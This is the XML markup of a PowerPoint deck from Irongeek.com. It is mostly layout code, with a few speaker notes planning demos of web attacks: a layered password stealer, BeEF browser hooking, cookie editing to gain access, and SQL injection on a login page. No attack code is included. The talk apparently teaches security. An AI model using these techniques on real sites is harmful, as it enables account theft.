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56" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="323" r:id="rId3"/>
    <p:sldId id="324" r:id="rId4"/>
    <p:sldId id="325" r:id="rId5"/>
    <p:sldId id="326" r:id="rId6"/>
    <p:sldId id="367" r:id="rId7"/>
    <p:sldId id="327" r:id="rId8"/>
    <p:sldId id="368" r:id="rId9"/>
    <p:sldId id="360" r:id="rId10"/>
    <p:sldId id="361" r:id="rId11"/>
    <p:sldId id="362" r:id="rId12"/>
    <p:sldId id="363" r:id="rId13"/>
    <p:sldId id="364" r:id="rId14"/>
    <p:sldId id="328" r:id="rId15"/>
    <p:sldId id="338" r:id="rId16"/>
    <p:sldId id="356" r:id="rId17"/>
    <p:sldId id="342" r:id="rId18"/>
    <p:sldId id="339" r:id="rId19"/>
    <p:sldId id="340" r:id="rId20"/>
    <p:sldId id="365" r:id="rId21"/>
    <p:sldId id="345" r:id="rId22"/>
    <p:sldId id="346" r:id="rId23"/>
    <p:sldId id="366" r:id="rId24"/>
    <p:sldId id="352" r:id="rId25"/>
    <p:sldId id="331" r:id="rId26"/>
    <p:sldId id="350" r:id="rId27"/>
    <p:sldId id="351" r:id="rId28"/>
    <p:sldId id="330" r:id="rId29"/>
    <p:sldId id="357" r:id="rId30"/>
    <p:sldId id="353" r:id="rId31"/>
    <p:sldId id="354" r:id="rId32"/>
    <p:sldId id="355" r:id="rId33"/>
    <p:sldId id="347" r:id="rId34"/>
    <p:sldId id="359" r:id="rId35"/>
    <p:sldId id="348" r:id="rId36"/>
    <p:sldId id="349" r:id="rId37"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6881813"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23" autoAdjust="0"/>
    <p:restoredTop sz="81104" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="-324" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="33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1992" y="-96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2928"/>
        <p:guide pos="2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120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898103" y="1"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C0B61596-1136-4FA0-B0FA-E774D9DADA7F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="8829968"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898103" y="8829968"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{52017ADD-5A18-44A7-B198-90DD2FC8354E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29160696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120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898103" y="1"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AED266BC-23E9-46C1-8352-C8C9D469F92E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119188" y="696913"/>
            <a:ext cx="4643437" cy="3484562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688182" y="4415791"/>
            <a:ext cx="5505450" cy="4183380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="4611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29968"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898103" y="8829968"/>
            <a:ext cx="2982120" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92235" tIns="46117" rIns="92235" bIns="46117" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BB3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="614784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B3F4307-D3BB-4294-BDB2-9738A833E8BB}"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Got to show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> some of the more complicated ones from the text file, especially the layered password stealer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BB3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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Got to show some Beef. Maybe just the alert.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BB3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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Edit a cookie, get in with ease.</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BB3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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B3F4307-D3BB-4294-BDB2-9738A833E8BB}"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24</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25</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B3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</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27</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28</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29</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30</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31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33</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B3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</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B3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</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36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B3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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B3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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Besides the above,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> show “SQL Injection!” plugin on login page. Use password field. Maybe show firebug by right clicking to inspect an element.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Injectme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will not work if all fields are blank.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>You are logged in as</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BB3F4307-D3BB-4294-BDB2-9738A833E8BB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>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lIns="45720" tIns="0" rIns="45720" bIns="0" anchor="b">
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="17220000"/>
              </a:lightRig>
            </a:scene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lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>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13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{FC792174-60E5-4DB5-AC24-51715D6953E0}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Irongeek.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DF0057EB-7238-4009-9252-8B55283E6D8B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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9BF4AA76-4E64-4FDB-AC58-24FB80A2D37D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010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7B16BBC-3AD4-455D-B3CE-507F6DB1AA94}"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5E1437F-8864-4D42-B820-741711E368E3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010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6DE6338-E3AE-4369-983F-4210CED66F4B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>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6071E70E-7A0F-4790-A459-AE20FEF9162B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010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A0239D9-44C8-4F6E-BB13-70B1CC884E60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1600200" y="2507786"/>
            <a:ext cx="7086600" cy="1509712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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6988625-263C-43A0-8C3F-63AC0FAF8029}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010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C13B27-8EC2-4F5F-9DA5-D3C012363B35}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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BF362503-9846-445D-ABB5-954A60CFB6F1}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</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1A3C0217-E285-4458-9993-9394D1F64462}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>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8B8F07D3-1943-4BCA-9533-0777C2BA2128}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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1E61B54E-F3C3-4DEE-9245-288B42ABF836}"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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0D30FC56-1518-455F-9DAB-57F008E3559A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>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9E5605BF-7072-43F6-B20B-42B581EA0063}"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99ED8C2D-821E-49DE-A890-7FF4495653EB}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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AB4DFC1F-3589-444D-8396-63786EB6B8ED}"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sp3d prstMaterial="softEdge"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="2200" b="0">
                <a:ln w="6350">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:tint val="73000"/>
                    <a:satMod val="180000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr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B9FFAA8E-3019-4854-8C02-F09B944CC9F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</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9719BEE-5D84-4A2E-B863-ED9BF66AE316}"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ormAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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828800" y="1166787"/>
            <a:ext cx="5486400" cy="530352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" rIns="45720"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">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fld id="{2E318707-7EBB-4841-9E9F-0B1455B824F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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01665400-167D-4AF2-BDFF-10489DFB70F9}"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lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Text Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="47085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7F9788DC-0CC9-40BC-92D8-795794D78067}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>7/8/2010</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr kumimoji="0" sz="2500" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Irongeek.com</a:t>
            </a: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fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr kumimoji="0" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:shade val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8C4A9CB9-88AF-4A98-B897-49973D47DBCB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 6" descr="mascot small.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7680325" y="5430838"/>
            <a:ext cx="1463675" cy="1427162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488113"/>
            <a:ext cx="2098675" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://Irongeek.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="dk1" tx1="lt1" bg2="dk2" tx2="lt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ransition/>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1" kern="120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vl2pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4100" b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
